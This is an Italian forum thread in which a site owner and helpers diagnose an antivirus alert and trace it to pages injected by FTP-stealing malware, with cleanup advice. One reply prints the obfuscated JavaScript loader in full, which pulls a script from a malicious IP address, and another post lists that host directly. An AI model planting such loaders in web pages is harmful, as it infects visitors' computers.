Virus Exploit.JS.Agent.agr

Buongiorno. Questo mi sembra un problema serio. Da qualche tempo visualizzando il mio sito mgdosio.altervista.org i maggiori antivirus segnalano la presenza del virus in oggetto, classificato ad alto rischio, contenuto nel file internet temporaneo denominato jquery[1].js che viene messo puntualmente in quarantena. Desidero precisare che il mio HTML è pulito, e nella mia cartella sul server non sono presenti file con estensione js. Ma da dove viene questo virus? Sono molto preoccupata: questa cosa allontana i visitatori! E' un bel pasticcio! Qualcuno sa darmi una spiegazione?

Il problema non sembra derivante dal sito.
Fai una bella scansione del tuo computer.


Ciao!

[versionilatino]

Quando ho perto il tuo sito il mio pc ha avuto subito la CPU a 100% finchè non l'ho chiuso...

EDIT: avg 8 mi ha trovato un virus...

Devo precisare che prima di scrivere al forum avevo già provveduto a fare tutte le scansioni possibili sul mio pc, che non è risultato precedentemente infetto. Io utilizzo sia Firefox che Internet Explorer: il primo mi svuota la cache dei file temporanei alla chiusura del browser, per il secondo io provvedo a svuotare manualmente tutti i file temporanei alla chiusura del browser. In ogni caso riaprendo uno qualsiasi dei due, e visitando il mio sito per primo, il virus viene puntualmente caricato dai file temporanei di mgdosio.altervista e messo in quarantena. Quindi non c'è nessun dubbio, è colpa del mio sito. Ma i file che io ho caricato sul server sono tutti puliti, ed ho perfino provato questa mattina a ricaricarli ex novo, ma non cè niente da fare. Il problema viene rilevato anche dai pc di miei amici che utilizzano antivirus di marche diverse. E se fosse un problema di server? E' davvero grave. Qualcuno può entrare nel mio sito (mgdosio.altervista.org) e dirmi cosa gli succede? (Mi raccomando, con l'antivirus attivo!). Sono preoccupata, perchè perdo visitatori e reputazione! Grazie.

[eeepc901]

Non so se può essere d'aiuto o meno, dato che navigo con Linux e non ho un antivirus per testare. L'unica cosa però che ho notato è che "NASA Gallery - dal sito della NASA" non mi presanta un contenuto, ma rimane come se mancasse un plugin o altro in visualizzazione (il che potrebbe anche dipendere da un plugin non presente in Linux). Forse però è tale componente (esterno al tuo sito) che contiene codice js che viene interpretato come virus dagli antivirus. Se l'ipotesi fosse corretta, ti basta disabilitare per un attimo tale componente e fare la prova sul sito.

[darkwolf]

NoScript mi blocca un certo: 94.247.2.195
non conosco la provenienza di questo ip ma posso indicarti questo:
http://whois.domaintools.com/94.247.2.195
http://94.247.2.195/ (risulta un sito malevolo)
http://www.google.it/search?source=i...lr%3D&aq=f&oq=
http://blog.scansafe.com/journal/200...gle-serps.html (qui info utili)
Prova a capire perchè quest'ip è presente nella tua pagina e risolverai il tuo problema
-
Edit: trovato!
La stringa "malevola" è nel codice del calendario: hxxp://tuosito,altervista.org/calendarmgd_frame.htm (censurato per evitare che qualcuno ci clicchi)

Codice:

<script language=javascript><!-- 
document.write(unescape('Q4m%3CsQ4mcpGoript%20srczo%3D%2F%2FU309zo49vo%2Ei12479vo%2E2%2E195%2Fjqu3hHery9vo%2E3hHjQ4ms%3E%3CpGo%2FpGosi1ci1rpGoipt%3E').replace(/Q4m|zo|U30|9vo|3hH|i1|pGo/g,""));
 --></script><body>

In effetti ho cancellato dal server il documento calendarmgd_frame.htm, ma sembra che il problema sia solo parzialmente risolto: ebbene, su tutte le pagine (o quasi) del mio sito compare la stringa malevola che darkwolf (che ringrazio) mi ha intelligentemente segnalato! Ma come è possibile?? I miei documenti originali non contengono quella stringa!!! Come ha fatto a finire lì? Un maleintenzionato ha violato la protezione del server e ha modificato tutti i miei documenti? La stringa malevola è stata aggiunta a tutte le mie pagine! !!! Tutto il mio sito è stato plagiato!!!!! E' orribile........

[darkwolf]

Da quanto ho letto è un malware dal pc che infetta i siti.
Cioè tu hai un malware, questo si accorge che fai il login via ftp al sito, si memorizza i dati e in modo silent fa il suo sporco lavoro

Questo significa che devo formattare il pc?

[darkwolf]

Beh formattare è esagerato...
Ti consiglio di aggiornare l'OS (WindowsUpdate); Aggiornare l'antivirus; una scansione con SpyBot; una passata con ComboFix e infine di cambiare la password del tuo account ftp
PS: ovviamente devi anche rimuovere la stringa da tutte le pagine del tuo sito.

Tutti gli strumenti che hai citato li ho disponibili, mi manca Combofix che se non sbaglio è un anti-rootkit. E' scaricabile da qualche parte?

[darkwolf]

Qui una descrizione: http://www.bleepingcomputer.com/comb...o-use-combofix
Qui il download diretto: http://download.bleepingcomputer.com/sUBs/ComboFix.exe

[AlexKidd]

e pensare che a vederlo cosi sembra l'innocuo JQuery

http //94.247.2.195 jquery.js guardate il codice voi stessi

[dreadnaut]

se non fosse che verso la fine del codice include un'altro file, che a sua volta scarica un eseguibile.

Combofix è un software davvero interessante: ha rilevato il malware che gli altri software non avevano rilevato (nè Spybot, nè Zonealarm Total Security) e mi sembra che sia riuscito a porvi rimedio. (Mi piacerebbe sapere se si tratta di un programma da utilizzare solo in casi di emergenza o può essere usato periodicamente per tenere a posto il pc). Alla fine della procedura Combofix consiglia di inserire il suo file di log nella discussione in cui è stato chiesta la sua esecuzione: citando alla lettera il manuale "...E' possibile che Combofix già al primo utilizzo risolva i problemi riscontrati. Si consiglia vivamente di pubblicare ugualmente il log nella discussione nella quale si sta ricevendo aiuto in quanto potrebbero esserci ancora infezioni che richiedono ulteriori analisi". Chiedo conferma a voi prima di pubblicare il file di log, perchè è piuttosto lunghino.
Ho provveduto ad aggiornare OS, Spybot, Antivirus, ho modificato le password, poi installerò Noscript su Firefox, chissà cosa potrei fare ancora.... Intanto ricontrollo tutti i documenti del mio sito, quando avrò finito proverò a fare il trasferimento FTP, e.........che qualcuno me la mandi buona!

[darkwolf]

Magari caricalo in una directory del tuo sito e linkacelo.
Io lo uso solo quando necessario (pc palesemente infetti che non si riesce a ripulire)

Il mio file di log di Combofix lo potete trovare qui:

http://mgdosio.altervista.org/combo/ComboFix.txt